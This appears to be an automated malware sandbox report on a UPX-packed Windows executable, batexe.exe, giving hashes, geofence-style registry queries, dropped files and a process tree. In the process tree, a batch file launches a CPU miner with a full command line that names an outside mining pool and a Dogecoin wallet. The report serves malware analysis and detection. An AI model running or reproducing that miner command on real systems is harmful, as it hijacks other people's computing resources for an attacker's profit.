73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
311s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
11/02/2024, 16:19

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4496	b2e.exe
1688	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe
1688	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1056-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1056 wrote to memory of 4496	1056	batexe.exe	85
PID 1056 wrote to memory of 4496	1056	batexe.exe	85
PID 1056 wrote to memory of 4496	1056	batexe.exe	85
PID 4496 wrote to memory of 5100	4496	b2e.exe	86
PID 4496 wrote to memory of 5100	4496	b2e.exe	86
PID 4496 wrote to memory of 5100	4496	b2e.exe	86
PID 5100 wrote to memory of 1688	5100	cmd.exe	89
PID 5100 wrote to memory of 1688	5100	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1056
- C:\Users\Admin\AppData\Local\Temp\7CCC.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7CCC.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7CCC.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9258.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7CCC.tmp\b2e.exe

Filesize
4.5MB

MD5
4d8cc70cf64ad339757c9ec8146be1f9

SHA1
1737581ede8654a35c70678e7776b5764b210c68

SHA256
259dc2a89a1eb74d6cc4bb6aa2a6687c7deee481ad646a33233857daa7228d19

SHA512
6804564e2c35296601c6b1cd00051abbc97f7d0d32962a0bd667e5fda3af3f2dd44476458c8e8bca27d7a72903bdd807eb4f0b5927a2cf6fafd9290d7fea15f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CCC.tmp\b2e.exe

Filesize
3.3MB

MD5
f7a9dc8af201de5ae93eee10234e7e27

SHA1
aae77427462e021566d04795b36e73ca3f74a9b3

SHA256
a53024e736c128f3013d27a439f6877dad22c95f1535a4e26fa64543afcc43be

SHA512
c0d607a037281be552d18e74e761693cfef05999020e0ee487723d1e5f343ecd54910047cc13051226d123ad020b1e62c4f7379584bddded486997127f3e7085

Download Submit
C:\Users\Admin\AppData\Local\Temp\7CCC.tmp\b2e.exe

Filesize
2.5MB

MD5
e1f5b9071a32d815dfdf35c8d7da2fb1

SHA1
4593a91a8e30c1aa5c364f5e84daed232c7c45eb

SHA256
e70149ea972813cbc5a5dc598408b135a8b0d428033c803463641bc366b0bfbb

SHA512
cd8d4beacd92a8fcce0209bf62181cfcdca57c13932345b63da5a1d0c502fc0e641fd932ee74c0bc062334e5e0e31809e418094515279780840b33348b38f772

Download Submit
C:\Users\Admin\AppData\Local\Temp\9258.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.9MB

MD5
2723c133a25660ded2444260b20fa9b8

SHA1
1960540e053efc2aa36f6606c2f640877004d908

SHA256
16c21c19c1f55f1363162a816a9141c1bbf45db6b4832b410d472ff6d907c225

SHA512
c24a13304b078da12736f762e8349e594280c147ee435be1281fb861bf059d4857c28dc0c7170c548059a1d6ae7b97ccc3861e4a247d8de34a67e9885cc27286

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.6MB

MD5
c6123fe953bc55a965661ddfb9784a4b

SHA1
73e44aa993e1639aca3a3fc8e9eb63a623c4bb45

SHA256
6ebe1b62550c2cafcb4eb854c3f62c63339bddbe79c776f24849b855848455e4

SHA512
9ff334226c50daefd89e58fbbf0764e61ee926bb15583a9650642087582e56e7c7b7621409193b78521dc9c0a0771488aaec760f12a1b559340484461d6881f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.7MB

MD5
fee4b20e334cc8e00736b4ba64f989c0

SHA1
4350895e77c4acdb76584278b1cee0cb0400987c

SHA256
b5ca76a46faa3c07861f09d0449a083985b11d246a0e605ccbbbcdacaa2fa695

SHA512
3f345359a3f971eb616ae41232507b3c8f35597c5edb6538061ae2420dd5f71485f6485c12d57ce12c77ba4711093ea4e3402e027ae8dddb809076e66db166ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1015KB

MD5
5db2a7c8f8c4e51f7070351d16692ac0

SHA1
a24ed694b79fd862b2cf6533800a066cffe965dd

SHA256
c7ae6606b99d3ad0a299033ecd1cebbc55e5665ece80c27d6441dd85c66af792

SHA512
04d238fe1d1bcda1ffed073ccb60e9fd51aab520cd1eca398eda970b51474b43e3f6f0ec1019ac77fe0c230bf59088cb41f5b809da996129843d40705c658f15

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
603KB

MD5
d64a5c59f48c5bdd920d0d1e5d5a1895

SHA1
2ec284dc6e06304cf8ccf0a66d1723080a344637

SHA256
865b4e738df8fb024ec9ca781ad7f604b65e1d191c1080d0490bd5bf79545ed1

SHA512
7d74f503ee1b4d73b21abebb949bb43501b935edc8f7e60966a18d3e9b5cac359d8f84bae37a8c5a77cd7bb275b0b0cd66a351630729054597141bcc25606e80

Download Submit
memory/1056-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1688-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1688-47-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/1688-49-0x0000000051D90000-0x0000000051E28000-memory.dmp

Filesize
608KB

Download
memory/1688-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-48-0x0000000001010000-0x00000000010CC000-memory.dmp

Filesize
752KB

Download
memory/1688-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-42-0x0000000001010000-0x00000000010CC000-memory.dmp

Filesize
752KB

Download
memory/1688-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1688-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4496-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4496-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download